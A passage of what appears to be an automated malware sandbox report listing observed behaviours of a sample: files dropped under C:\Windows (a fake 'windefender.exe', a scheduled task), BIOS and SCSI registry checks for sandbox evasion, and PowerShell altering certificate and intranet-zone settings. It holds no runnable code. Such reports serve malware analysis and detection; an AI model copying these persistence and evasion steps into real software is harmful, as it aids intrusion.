File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\ztlTbPYifermRZH.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" C:\Windows\windefender.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 99e14e26ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ecaebe2bff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\MrtCache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d149192cff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0ec76d26ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
